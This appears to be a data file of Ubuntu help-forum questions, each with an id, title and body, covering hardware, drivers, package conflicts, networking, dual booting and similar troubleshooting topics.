519727	hid multi touch device not mapping co-ordinates properly	i have a touchpad software implemented cimposite hid device , which includes a hid keyboard and a hid multitouch touchscreen . when i connect this device to a linux ( ubuntu ) pc or a windows machine . i see that the keyboard interface works fine , i get all required key presses detected by ubuntu and windows properly . but when i use the touch , the touch events are being sent to pc ( i can see from logs ) and i also see that the pc cursor moves when i move my finger over the touchpad . the problem i see is that the touchpad co-ordinates do not map to screen co-ordinates , the touch pad is of 2048x2048 resolution , when i move finger around the touchpad the pointer on pc hardly move in a small rectangular area of around 90x50 size . any idea what could be the issue ? ? i used a usbanalyzer softwarr to capture usb log on a windows machine , for each touch i see there are several messaged send over usb example : input report usage range lg/ph value in range off..on on x [ 0..32767 ] 659 y [ 0..32767 ] / [ 0..28927 ] 1332 contact identifier [ 0..32767 ] / [ 0..28927 ] 2 i see that the co-ordinates sent are correct . i want to know why the windows or ubuntu r does n't detect it as a standard touch event and move the cursor to specified co-ordinates ? and why does the pointer keeps moving around in a small area of around 90x50 ? any advice / help / pointer highly appreciated . thanks
519728	migrate from thunderbird to evolution without re-downloading imap mails	i have about 3gb mails hold for offline usage in my thunderbird and it would take quite a while on a slow iinternet connection to re-download them all again in evolution . is there a way to install evolution and take the mail folders from the thunderbird profile to fill the evolution mail folder ?
519729	only get the h+w geometry of my screen without the later +x+y	i am reading this article . there is a statement there that goes : ffmpeg -f alsa -ac 2 -i hw:0,0 -f x11grab -s $ ( xwininfo -root | grep 'geometry ' | awk ' { print $ 2 ; } ' ) -r 25 -i :0.0 -sameq -f mpeg -ar 48000 -s wvga -y sample.mp4 when i run the command i get an error with the section that says : xwininfo -root | grep 'geometry ' | awk ' { print $ 2 ; } ' the reason is that when you use this command on my computer it outputs : 1360x768+0+0 how do i remove the last part of the screen resolution output to be 1360x768 instead of 1360x768+0+0 ?
519732	how to debug nic failure ?	i 'm experiencing failure of an asix ax88179 nic inside a usb 3.0 3 ports hub plugged into usb 3.0 port of a lenovo ideapad z500 . the pc has another nic which is not used while the failing device is in use . characteristics for failure : the data rate goes down to 0 b/s up and downstream from one instant to the other the nic remains listed in ifconfig the issue is usually recoverable with ifdown eth1 & & ifup eth1 ( if the nic is managed in /etc/network/interfaces ) or with disconnection and reconnection in the network manager applet in unity ( i say ususally because if btrfs images are mounted via loop device kernel deadlocks occurs - i guess due to a btrfs transaction getting stuck ) . i see a lot of ( > 1000 ) log entries in the form of aug 31 07:40:45 richter-lenovo-ideapad-z500 kernel : [ 39776.946133 ] ax88179_178a 4-1.1:1.0 eth0 : kevent 2 may have been dropped in /var/log/kern.log . i 've installed the asix driver 1.10.0 from http : //www.asix.com.tw/frootattach/driver/ax88179_178a_linux_driver_v1.10.0_source.tar.bz2 with make & & sudo make install & & sudo update-initramfs -u -k all & & sudo reboot . besides the warnings ( which i do n't understand ) no entries in /var/log/kern.log , /var/log/syslog and dmesg . i assume it 's no simple power failure because the usb hubs works ( i connected my mouse via it ) . cables have been changed and are not exposed to extraordinary mechanical influences . i have another asix ax88179-based nic ( are there any alternatives for linux ? ) which show the exact same behavior . one remarkable thing which is probably related and makes me think the issue is n't trivial : after failure and reconnection the speed of my freenas based nas increases by 600 % ( e.g . 16 mb/s - > 110 mb/s ) for the rest ( sometimes > 20 gb ) of the transfer ( no write buffer is that large to have an impact on the improvement ) . this behavior is quite similar for nfs and cifs mounts . how could i get started debugging the failure of the nic ? i 'm running ubuntu 14.04 and experiencing the issue with current kernel 3.13.0.35.42 and mainline kernels 3.15.10 and 3.16.1 ( ca n't test 3.17-rc2 due to deadlocks ) .
519735	wake up command as ordinary user	yandex disk cloud drive daemon started via ~/.config/autostart/yandex.disk.desktop . it works well except the pc waked up after suspend . yes , i work with /etc/pm/sleep.d scripts when i need to do something at wake up as root . but how to execute some command after waking up as an ordinary ( ! ) user ? seems bad idea to catch manual unlock because i setting up ubuntu to auto-unlock when waking up .
519736	floppy is read but not written on ubuntu 14.04	i 'm trying to mount a floppy drive ( tested on windows98 , it works ) but i still encounter mounting errors . i enabled the floppy drive for my user - which has been disabled - and installed udisks . when i mount it as /dev/fd0 , i ca n't read/write onto the drive , while if i mount as /media/floppy/ i can read the drive but i ca n't write onto it ( read only mode ; disk is enabled for writing ) . which do you suggest to try for mount ( and actually reformat ) the floppy ? i 'll post what i try for understand where is my fault : ) tried to mount with udisks -- mount /dev/fd0 it says mount failed : error mounting : mount exited with exit code 1 : helper failed with : mount : block device /dev/fd0 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/fd0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so and with sudo mkdir /mnt/floppy sudo mount -t msdos /dev/fd0 /mnt/floppy it says mount : secondo mtab , /dev/fd0 ă¨ montato su /media/username/disk2 when i want unmount i use the gui or sudo umount /dev/fd0 and if i try to format with sudo mformat -f 1440 a : it says plain_io : input/output errors buffer_flush : short write with automount ( gui mode ) , located at /media/username/disk2 , i can read disk , but ca n't write on it . somewhere is suggested to rollback udisks package to an older version which has a better handling of floppies .
519739	errors when trying to install libc6	i was trying to install libc6 with this commend : sudo apt-get install libc6* and i got some errors : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcgi-application-plugin-captcha-perl : depends : libdata-random-perl but it is not going to be installed libcloog-isl-dev : conflicts : libcloog-ppl-dev but 0.16.1-5 is to be installed libclutter-gst-2.0-doc : conflicts : libclutter-gst-doc but 1.6.0-2build1 is to be installed libcuda1-304 : conflicts : libcuda-5.0-1 libcuda1-304-updates : conflicts : libcuda-5.0-1 libcuda1-331 : breaks : libcuda-5.0-1 breaks : libcuda-5.5-1 libcuda1-331-updates : breaks : libcuda-5.0-1 breaks : libcuda-5.5-1 libcunit1-ncurses : conflicts : libcunit1 but 2.1-2.dfsg-1 is to be installed libcunit1-ncurses-dev : conflicts : libcunit1-dev but 2.1-2.dfsg-1 is to be installed libcurl4-gnutls-dev : conflicts : libcurl4-nss-dev but 7.35.0-1ubuntu2 is to be installed conflicts : libcurl4-openssl-dev but 7.35.0-1ubuntu2 is to be installed libcurl4-nss-dev : conflicts : libcurl4-gnutls-dev but 7.35.0-1ubuntu2 is to be installed conflicts : libcurl4-openssl-dev but 7.35.0-1ubuntu2 is to be installed libcurl4-openssl-dev : conflicts : libcurl4-gnutls-dev but 7.35.0-1ubuntu2 is to be installed conflicts : libcurl4-nss-dev but 7.35.0-1ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . someone help me plz : / tnx
519742	create a new connection and connect to hidden network disappears from network bar	my wireless network card is broadcom b4313 , the default wireless driver installed with ubuntu 14.04 was not supporting access point mode . so i removed the default driver and installed brcmsmac driver but after installing create a new connection and connect to hidden network options not showing in network bar and also available wifi networks also not showing . am i only able to create hotsopt connection through ap-hotspot ?
519744	softlayer desktop vpn client	i 'm having an issue using softlayer 's desktop vpn client for linux . i 've found that i am only able to successfully connect to my vpn secured services the first time i run the client . every subsequent attempt to run the client seems to succeed , though i am unable to connect to my secured services . here 's what i see when i run the client in the command line the first time after restarting my computer : ./array_vpnc -hostname vpn.dal01.softlayer.com -username xxx -passwd xxx array_vpnc : vpn tunnel successful ! after that first time , this is what i see after stopping the service and starting again : ./array_vpnc -hostname vpn.dal01.softlayer.com -username xxx -passwd xxx siocaddrt : file exists siocaddrt : file exists array_vpnc : vpn tunnel successful ! i have also noticed that my /etc/resolv.conf gets overwritten when running the client . i 've been manually restoring it in order to be able to use the internet . here 's what is written into my resolv.conf file : nameserver 10.0.80.11 nameserver 10.0.80.12 thanks for any help you can give ! my system specs : ubuntu 12.04 lts ( a custom ibm version ) memory : 7.6 gib processor : intel core i5-4300u cpu @ 1.90ghz x 4 os type : 32-bit
519745	printer wo n't print ( canon lbp6300dn )	i 'm using latest ubuntu 14.04 ( fresh install ) 64-bit . every command concerned was run as sudo . i tried installing canon lbp 6300dn network printer ( connected to my router as 192.168.0.215 ) as per instructions from the manufacturer 's drivers . unfortunately i ca n't link the instructions because they are only available in the driver package which is available at canon 's website ( link might not work ) . the newest version has both 32bit and 64bit debian and rpm packages , and the debian packages installed fine . when the installation was done , and i tried printing the error i got was : `` ccp sent_data error , exit '' . also the last step of the instructions is to start ccpd `` /etc/init.d/ccpd start '' . however this does n't give me the same output as usual init.d start commands ( ok or something ) , but it only outputs `` starting /usr/sbin/ccpd : . '' and at some point ( after it did n't work the first time ) i ran the same command again , and ended up with overflow of ccpd processes ( command 'top ' only returned a huge list of ccpd 's ) and i had to reboot . i have also tried to only install the packages canon provides and then add the printer through ubuntu 's own printer menu , where it finds the printer and seems to add it without problems . it just that it still wo n't actually print anything . edit : and the printer will print without problmes with my windows laptop , so the problem is n't there .
519747	elantech touchpad - multi touch is not working for kernel 3.13.0-35-generic	i recently updated my kernel to 3.13.0-35-generic , after update my elantech touchpad multi touch stopped working i tried fixing it from here https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1166442/+index ? comments=all but still its not working , i am using ubuntu 14.04 , lenovo z510 update : steps i followed to fix downloaded the patch from here https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1166442/+attachment/3941591/+files/psmouse-elantech-x551c.tar.gz sudo dkms ldtarball psmouse-elantech-x551c.tar.gz sudo dkms install -m psmouse -v elantech-x551c sudo rmmod psmouse sudo modprobe psmouse note : same step worked fine for older version of kernel . ( able to get multitouch working )
519748	ubuntu 14.04 minimaal upgrade to full version	how can i upgrade my desktop unbuntu minimaal 14.04 version to full ubuntu 14.04 ? i am not good at using commonds but if there is instructions and the commonds , i am keen to go for . thank you for your help , in advance . tim
519750	installing ubuntu alongside windows 8 didnt show free partion	i am try to install ubuntu 14.04.1 along side windows 8. i follow this tutorial http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html . but when installation gives me to select partition it did n't show free space i currently shrink from windows.it only show 3 sda partitions.1 and 2 for windows [ loader ] and system.other one has my all of partition space and it show as one partition ... please help..i really want to install ubuntu .
519751	g++ compiler absent in ubuntu 14.04 lts	when i tried to compile a c++ program in ubuntu 14.04 lts it said the program g++ is currently not installed but this package is not available i also checked in /user/bin/ there was no file named as g++ or g++-4.8 . what should i do ?
519754	not getting internet connection on android phone	i installed ap-hotspot as mentioned in this link on ubuntu 14.04 : now am able to connect to hotspot through my android mobile but not getting internet connection on it and instead of ip starting with 192.168 am getting hotsopt ip address as 10.10.0.2 .
519757	error message when implenting usb/serial module as described by kaz ( may 31 , 2013 )	i received this message : warning ! ! all config files need .conf : /etc/modprobe.d/ndiswrapper , it will be ignored in future release . i am using ubuntu 12.04 also and was trying to install the 'pl2303 ' module . why would i get this message when all else seems the same ? i 'm not ready to upgrade to 14 yet so i hope there is a simple answer here . thanks . tony
519761	networkmanager unable to complete wifi connection	when my built-in ethernet controller died over the weekend , i bought a tp-link wn725n usb wifi adapter . from a laptop , i obtained some firmware and a module from `` sensorgnome '' because the module with 12.04 lts would n't complete a connection at all , and there was no firmware in /lib/firmware/rtlwifi . once installed , the lights blinked and things started to happen . sadly , while the hardware seems ok , networkmanager or some associated script fails to complete . for the record , here are the outputs from several codes : iwconfig ( no editing done ) wlan0 unassociated nickname : '' < wifi @ realtek > '' mode : managed frequency=2.412 ghz access point : not-associated sensitivity:0/0 retry : off rts thr : off fragment thr : off power management : off link quality:0 signal level:0 noise level:0 rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lsusb ( unrelated usb devices edited out ; the correct device is shown ) bus 001 device 010 : id 0bda:8179 realtek semiconductor corp. lshw ( all but the wireless network device edited out ) *-network description : wireless interface physical id : 1 bus info : usb @ 1:1.6 logical name : wlan0 serial : e8 : de:27:17:66 : aa capabilities : ethernet physical wireless configuration : broadcast=yes driver=r8188eu multicast=yes wireless=unassociated syslog ( blank lines inserted for readability ) sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) starting connection 'debian' sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0/wireless ) : connection 'debian ' has security , and secrets exist . no new secrets needed . sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > config : added 'ssid ' value 'debian' sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > config : added 'scan_ssid ' value '1' sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > config : added 'psk ' value ' < omitted > ' sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > config : set interface ap_scan to 1 sep 3 12:13:30 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning sep 3 12:13:31 ve6cta wpa_supplicant [ 1019 ] : trying to associate with 00:13:46 : fb:48:18 ( ssid='debian ' freq=2412 mhz ) sep 3 12:13:31 ve6cta wpa_supplicant [ 1019 ] : association request to the driver failed sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > associating sep 3 12:13:31 ve6cta kernel : [ 77238.553277 ] r8188eu : error assoc success sep 3 12:13:31 ve6cta wpa_supplicant [ 1019 ] : associated with 00:13:46 : fb:48:18 sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : supplicant interface state : associating - > 4-way handshake sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > group handshake sep 3 12:13:31 ve6cta wpa_supplicant [ 1019 ] : wpa : key negotiation completed with 00:13:46 : fb:48:18 [ ptk=ccmp gtk=ccmp ] sep 3 12:13:31 ve6cta wpa_supplicant [ 1019 ] : ctrl-event-connected - connection to 00:13:46 : fb:48:18 completed ( reauth ) [ id=16 id_str= ] sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : supplicant interface state : group handshake - > completed sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'debian ' . sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) scheduled . sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) started ... sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > dhclient started with pid 7416 sep 3 12:13:31 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . sep 3 12:13:31 ve6cta dhclient : internet systems consortium dhcp client 4.1-esv-r4 sep 3 12:13:31 ve6cta dhclient : copyright 2004-2011 internet systems consortium . sep 3 12:13:31 ve6cta dhclient : all rights reserved . sep 3 12:13:31 ve6cta dhclient : for info , please visit https : //www.isc.org/software/dhcp/ sep 3 12:13:31 ve6cta dhclient : execve ( /usr/lib/networkmanager/nm-dhcp-client.action , ... ) : permission denied sep 3 12:13:31 ve6cta kernel : [ 77238.574223 ] type=1400 audit ( 1409768011.941:129 ) : apparmor= '' denied '' operation= '' exec '' profile= '' /sbin/dhclient '' name= '' /home/usr/lib/networkmanager/nm-dhcp-client.action '' pid=7417 comm= '' dhclient '' requested_mask= '' x '' denied_mask= '' x '' fsuid=0 ouid=0 sep 3 12:13:31 ve6cta dhclient : listening on lpf/wlan0/e8 : de:27:17:66 : aa sep 3 12:13:31 ve6cta dhclient : sending on lpf/wlan0/e8 : de:27:17:66 : aa sep 3 12:13:31 ve6cta dhclient : sending on socket/fallback sep 3 12:13:31 ve6cta dhclient : dhcprequest of 192.168.0.104 on wlan0 to 255.255.255.255 port 67 sep 3 12:13:31 ve6cta dhclient : dhcpack of 192.168.0.104 from 192.168.0.1 sep 3 12:13:31 ve6cta dhclient : execve ( /usr/lib/networkmanager/nm-dhcp-client.action , ... ) : permission denied sep 3 12:13:31 ve6cta dhclient : bound to 192.168.0.104 -- renewal in 259466 seconds . sep 3 12:13:31 ve6cta kernel : [ 77238.603505 ] type=1400 audit ( 1409768011.973:130 ) : apparmor= '' denied '' operation= '' exec '' profile= '' /sbin/dhclient '' name= '' /home/usr/lib/networkmanager/nm-dhcp-client.action '' pid=7418 comm= '' dhclient '' requested_mask= '' x '' denied_mask= '' x '' fsuid=0 ouid=0 sep 3 12:13:32 ve6cta wpa_supplicant [ 1019 ] : wpa : group rekeying completed with 00:13:46 : fb:48:18 [ gtk=ccmp ] sep 3 12:13:51 ve6cta wpa_supplicant [ 1019 ] : wpa : group rekeying completed with 00:13:46 : fb:48:18 [ gtk=ccmp ] sep 3 12:14:16 ve6cta networkmanager [ 965 ] : < warn > ( wlan0 ) : dhcpv4 request timed out . sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 7416 sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < warn > activation ( wlan0 ) failed for access point ( debian ) sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < warn > activation ( wlan0 ) failed . sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] sep 3 12:14:17 ve6cta wpa_supplicant [ 1019 ] : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 sep 3 12:14:17 ve6cta networkmanager [ 965 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected sep 3 12:14:17 ve6cta kernel : [ 77283.820654 ] r8188eu : error indicate disassoc as you can see , my pc is bound to 192.168.0.104 , but then the dhcpv4 fails . incidentally , i 've ignored ipv6 settings , and set automatic ( dhcp ) for ipv4 settings . security is set to wpa/wpa2 personal with the correct password . it seems to be some sort of software configuration problem . any ideas and suggestions are welcome .
519762	dual monitors 14.04 garbled	i upgraded to 14.04 and when i login i briefly see my dual screens , then it goes garbled , ca n't see anything . if i boot in recovery mode , things go fine , except the monitors are replicated , and the system does not recognize dual monitors . i am using the on board graphics of a dell dimension 501 . it used to work in 12 .
519767	how to disable dynamic contrast in kubuntu ?	my environment is kubuntu 14.04 and graphic card is nvidia gtx 560 . the problem is with dynamic contrast changes . for example when i open `` bright '' webpages it looks like monitor is brightening up as well , when i go to `` dark '' pages , screen dims . it does n't look like it happens because some monitor setting - i use same screen with windows os and the problem does not appear . how do i disable this feature ?
519769	append a word to the end of a line in txt file	i have a file that should have `` ok '' at the end of a certain line the line that should be modified is the first line not ending with `` ok '' i can grep the file to get the line to be modified using the following code grep -vnm 1 ok '/content2' i need a help in add the pattern ok to the end of this line example : if the file content has the following lines aaaaaaaaaaaaaa ok bbbbbbbbbbbbbb ok cccccccccccccc dddddddddddddd eeeeeeeeeeeeee ok i need to add ok to the line contains the cccccccccccc only
519770	growing os size on hdd	are all the obsolete packages deleted after an upgrade/update ? i ask because my hd is growing with all these 300+mb updates . should i be running a `make clean ' after each upgrade/update ? thanks for any insight it would be greatly appreciated .
519772	how to find the path of a freshly mounted usb drive dynamically ?	i want a side script or a settings change that fires a second or primary script that does the actual work . i do not need to do it just for my computer . so it should work on any linux computer . i need to know the path ( and thereby content ) of a freshly mounted usb so that i can run a script that uses data on the usb for which i would need the path . i read some things about udev but they were n't explanatory enough . this command : action== '' add '' , attrs { idvendor } == '' abcd '' , attrs { idproduct } == '' 1234 '' , run+= '' /home/bibi/bin/xyz.sh will set a usb to run script every time any device is mounted to it . but how do i find out the path of the usb drive ? ( e.g . /home/ ? ? ? ) thanks in advance . sorry if insufficient data or if i missed something
519773	how can i uninstall/reinstall ubuntu from a dual boot with windows 8.1 ?	right now i have a dual boot set up with ubuntu 14.04 and windows 8.1 . however , i did some things on ubuntu that caused some of the packages to become `` inconsistent '' , and i tried to fix them but it did n't really work . rather than try , probably in vain , to fix it , i thought i would just uninstall it , repartition everything and go through the whole installation again , and be more careful not to cause the same errors . but if i simply erase the partitions , i wo n't be able to boot windows , and unfortunately i do n't have any sort of recovery disk/drive , i searched for hours and i 've come to the conclusion that i will have to have microsoft mail me a recovery disk , it 's simply not available online . i do have the recovery partition , however . but the problem is that windows does n't seem to be recognizing it as such . if i try to use the wizard to create a recovery drive it tells me there is no recovery partition and that it does n't have all the required files . in minitool partition wizard , it is clearly labeled `` recovery '' , and i checked the contents and it has everything it is supposed to have . but windows does n't think it exists , at least not as a recovery partition . in the windows disk manager it is labeled as `` healthy ( oem partition ) '' . maybe that is what it is supposed to be , but regardless it does n't let me create any recovery media . so how can i do this ? i want to keep windows just the way it is as far as my files and programs , but basically unpartition the drive and allow windows to be the only operating system again , as if i never had ubuntu on there in the first place . i may reinstall ubuntu afterwards , or try doing it a different way , or try a different linux os altogether . but i ca n't do this unless i restore the partitions and the windows boot configuration . i have an idea but i 'm not sure it will work , so i wanted to get some opinions from people who have more experience . if i were to manually copy the recovery partition to an external drive , could i then make it bootable , boot into it without even touching the partitions myself , and use the recovery disk to do all the repartitioning and restoration of windows configuration by itself , without losing my windows files , programs and setup ? that would be ideal , because if i got stuck not able to boot into windows it would be a huge problem , especially if the ubuntu partitions were totally gone . then i would n't even be able to reinstall it and regain the ubuntu boot configuration , unless i formatted my windows partition . i do n't want to do that .
519774	counter strike 1.6 crash on connect	i installed last version of ubuntu . i have a problem when i want to connect to a server , counter strike crash , no error nothing . it 's just like i tipe in the console `` quit '' . can somebody help me with this ? i read google from 2 days ... and still nothing . here is the error from terminal . error : libopenal.so.1 : can not open shared object file : no such file or directory could not load hw.so . i open my steam account , then i open the game , i connect to the server , after 5 seconds when i 'm trying to pick a team , the game crash . i tried to open from terminal to , but i have an error . some ideas ? thanks .
519777	facing problems after upgrading to ubuntu 14.04 from ubuntu 12.04	facing problems after upgrading to ubuntu 14.04 from ubuntu 12.04 keyboard problems - number lock 9 and up / left arrows are working automatically or without any touch . typing is impossible
519784	iked does not start but does n't report a problem either	i installed shrew soft vpn client using the instructions from http : //stackoverflow.com/questions/13175823/how-can-i-install-shrew-soft-vpn-client-under-ubuntu-12-10 everything seems to be working including the gui , but when i try to connect i get failed to attach to key daemon everything seems to report that this is because the daemon is not running . indeed it 's not , but when i do sudo iked i get this output : ii : created ike socket 0.0.0.0:500 ii : created natt socket 0.0.0.0:4500 # # : ike daemon , ver 2.2.0 # # : copyright 2013 shrew soft inc. # # : this product linked openssl 1.0.1f 6 jan 2014 seems like it 's working , but it 's not actually running if i check ps aux as root . and i continue to get the `` failed to attach '' error . i 'm not sure how to continue debugging from here .
519786	saving images of my ip-camera on my desktop using ftp	i have a camera which allows ftp connections . if i want my camera to send an image to my ubuntu desktop , would i need to install an ftp server on my desktop pc for this or is there an easier way ?
519787	problem upgrading to 14.04	i 'm trying to upgrade to 14.04 , but this message appears ( below ) and update manager closes ... '' could not initialise the package information an unresolvable problem occurred while initialising the package information please report this problem for the `` update-manager '' package and try to include the following error message : e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise_multiverse_binary-i386_packages , e : the package lists or status file could not be parsed or opened '' any suggestions/ideas gratefully received ... ricardo da fonseca
519788	permissions on windows 7 on a dvd drive that was shared via samba from a ubuntu machine	i have a laptop running ubuntu 14.04 lts with a dvd drive . my ( games only ) tower pc running windows 7 does not have any optical drives . i installed samba on the ubuntu laptop and created a share for the dvd drive . i was able to access the files using the windows machine . unfortunately , i had to copy the whole dvd , because i was not able to run a program from the share . windows told me , that it could not be executed and that i maybe lack the permissions to do so . i also was not able to change permissions on the share . is this issue due to windoze or do i have to change something in the samba config files ?
519789	need help with installation	when i try to install ubuntu , my computer makes me run it off the usb still and when i click on the icon that says install ubuntu 14.04.1 lts nothing happens at all and i am stuck running it off the usb . any help would be appreciated .
519791	is ext4 position independent and movable ?	does the data in an ext4 filesystem refer to absolute positions on the disk , or is it all relative to the start of the specific partition ? i want to know this because i want to move an ext4 filesystem so that it starts earlier on the disk . my current ext4 partition starts somewhere in the middle of the disk and extends to the end , and the only way to grow this filesystem is to make it start earlier . so , can i move the ext4 filesystem around with dd , and expect it to work at its new address ? of course , i would also have to edit my partition table , but that is a separate concern : )
519792	unable to install ubuntu in my windows 7 system	i was trying to install ubuntu in my system . i tried to install it from dvd . but what happens is , inbetween system is asking to remove the dvd from the drive and when i does that it sprestarted without installing ubuntu . can somebody help on this ?
519794	unable to mount gfs2 in 14.04	i 've installed gfs2-utils 3.1.6-0ubuntu1 . the package has a broken symbolic link , /usr/sbin/gfs2_mount , which points to a non-existing /sbin/mount.gfs2 . therefore mounting fails with 'unknown filesystem `` gfs2 '' ' . i 've tried mount.gfs2 from raring but it did n't work . has anyone succeeded mounting gfs2 in trusty ?
519796	unable to mount cifs with iocharset=utf8 in trusty	when i try to mount a cifs share with option iocharset=utf8 i receive the error : mount error 79 = can not access a needed shared library . what shared library am i missing ?
519798	ubuntu on mac 3,1 . typical trackpad and wifi trouble	i am new . 1.9gib ; intel core 2 duo @ 2.2ghz ; 64 bit ; 155gb disk ubuntu 14.04 lts installed ! i do n't quite understand the trackpad fix involving appletouch.ko a la here other suggestions welcome . found this , huge difference , very simple : synclient fingerlow=10 ; synclient fingerhigh=20 as for wifi , i believe the following information is relevant . my problem is that my home wifi is being detected , but it will not authenticate my password . i am successful in tethering it via hotspot on iphone . i 'm sure the answer is finding specific driver/updating . i 've updated and it works with other wifis . 14e4:4328 partially supported bcm4321 a/b/g/n n ( r2 ) wl also , once i do have to sudo ... whatever i need , is that the only step or is that just the receiving of said item and then i have to actually install/run . i hope this makes sense . thanks !
519799	i uninstalled python without realizing it 's really important . what should i do ?	how much have i broken and should i just reinstall the os ?
519800	questions about how malwares might operate under wine	a recent scan by clamav found that a few exe files in the wine directory are infected with a trojan ( called ratnim ? ) . a have a few specific questions on what a windows malware can do under linux . 1 ) can a wine malware ( not designed for linux ; only designed to run in ms windows environment ) put itself in the system start-up so that it runs everytime i boot the computer ? 2 ) if i were to scan for a wine program in the process list will i find something to indicated ( like a distinctive icon or a name ) to identify it as a wine application ? 3 ) can an application running under wine take screenshots ? 4 ) can an applications running under wine get hold of my webcam feed ? say when i am in a skype call ? ( i run linux version of skype if it helps ) i use certain windows applications under wine on a regular basis . my real concerns are really with points # 3 and # 4 . i am using ubuntu 14.04 lts . thanks in advance .
519801	linux installed on disk , but windows is its bootloader	i tried installing elementary os to my second hard drive . i found i was not able to boot it , when i finished installing . my computer simply booted windows . i checked to see what the problem was by using boot repair and i got this report : here i then tried using the automated fixing feature , but it failed when it tried to uninstall grub.which i believe was not there in the first place . thank you in advance for any help !
519803	how can i reset my cd/dvd drives from read only to read/write ?	i recently upgraded to 14.04 . everything worked great until recently . now my cd/dvd drives ( 2 of them ) will read the discs but will not write to the discs . it is like something switched the protocols and they are now `` read only '' drives . i really do need these drives to write the discs . i receive an error message `` unable to mount drive . already mounted '' . but i am not able to unmount the drive . when i try to write to it , and iso file will be saved to the hard drive only . any ideas ?
519806	install gitk with git 1.8.3.2	i seem to be unable to install gitk . can anyone help me decipher the below : $ git -- version git version 1.8.3.2 $ sudo apt-get install gitk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gitk : depends : git ( < 1:1.7.9.5- . ) but 1:1.8.3.2-0ppa1~precise1 is to be installed e : unable to correct problems , you have held broken packages .
